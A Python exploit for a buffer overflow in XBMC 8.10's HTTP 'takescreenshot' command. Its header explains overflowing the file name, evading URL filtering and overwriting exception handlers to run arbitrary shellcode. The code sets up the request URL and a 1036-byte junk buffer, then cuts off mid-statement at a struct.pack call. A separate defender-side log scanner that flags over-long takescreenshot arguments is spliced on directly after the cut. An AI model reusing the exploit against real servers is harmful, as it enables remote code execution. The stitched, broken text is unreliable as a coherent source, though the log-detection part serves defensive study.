#!/usr/bin/env python
'''
Xbmc takescreenshot request remote buffer overflow 8.10 !!!

Tested: Win XP SP2 eng
Vendor url: http://xbmc.org/
Release date: April the 1st 2009
Versions affected: Linux, Windows < tested; other versions are also possibly affected.
Restrictions: No restrictions

This exploit happens when parsing an overly long file name passed to the server
using the takescreenshot command. There is a description in the PoC code. When
passing this to the HTTP server we can evade URL filtering, as it is passed to the
application as an overly long dir. This means we can use any shell code we wish.
We are able to overwrite the exception handlers also, so creating a reliable
exploit for Vista and XP SP3 shouldn't be too hard; have a look, there are some
modules loaded without /SafeSEH.

Credits to n00b for finding the buffer overflow and writing PoC code and exploit.

----------
Disclaimer
----------
The information in this advisory and any of its demonstrations is provided "as is"
without any warranty of any kind. I am not liable for any direct or indirect damages
caused as a result of using the information or demonstrations provided in any part
of this advisory.

Educational use only..!!
'''

import sys, socket
import struct

port = 80
host = sys.argv[1]
Start_url = 'xbmcCmds/xbmcHttp?command=takescreenshot('
Junk_buffer = 'A'*1036
Jump_esp = struct.pack('
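As a defender-side addition that is not part of this advisory or the PoC above: a Python 3 log check that flags xbmcHttp takescreenshot requests whose argument is far longer than any real file name. The common-log-format sample lines, the 256-byte threshold and the helper names are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed threshold (constructed): the PoC sends 1036 filler bytes, so any
# argument far beyond a plausible path length is worth flagging.
MAX_ARG_LEN = 256

# Constructed sample access-log lines in common log format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Apr/2009:12:00:00 +0000] "GET /xbmcCmds/xbmcHttp?command=takescreenshot(shot.png) HTTP/1.1" 200 12',
    '10.0.0.5 - - [01/Apr/2009:12:00:01 +0000] "GET /xbmcCmds/xbmcHttp?command=getvolume HTTP/1.1" 200 7',
    '10.0.0.9 - - [01/Apr/2009:12:00:02 +0000] "GET /xbmcCmds/xbmcHttp?command=takescreenshot(' + 'A' * 1036 + ') HTTP/1.1" 500 0',
]

# Request line: client ip, timestamp, method and request target.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
# xbmcHttp command syntax: name(argument)
CMD_RE = re.compile(r'^(?P<name>[A-Za-z]+)\((?P<arg>.*)\)$', re.S)


def parse_xbmc_command(target):
    """Return (command_name, argument) for an xbmcHttp request target, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith('/xbmcCmds/xbmcHttp'):
        return None
    cmds = parse_qs(parts.query).get('command')  # parse_qs percent-decodes once
    if not cmds:
        return None
    m = CMD_RE.match(cmds[0])
    if m:
        return m.group('name').lower(), m.group('arg')
    return cmds[0].lower(), ''


def find_oversized_screenshot_requests(lines, max_arg_len=MAX_ARG_LEN):
    """Return (ip, timestamp, arg_len) for takescreenshot calls with an over-long argument."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parsed = parse_xbmc_command(m.group('target'))
        if parsed and parsed[0] == 'takescreenshot' and len(parsed[1]) > max_arg_len:
            hits.append((m.group('ip'), m.group('ts'), len(parsed[1])))
    return hits


if __name__ == '__main__':
    for ip, ts, n in find_oversized_screenshot_requests(SAMPLE_LOG):
        print('%s %s takescreenshot argument of %d bytes' % (ip, ts, n))
```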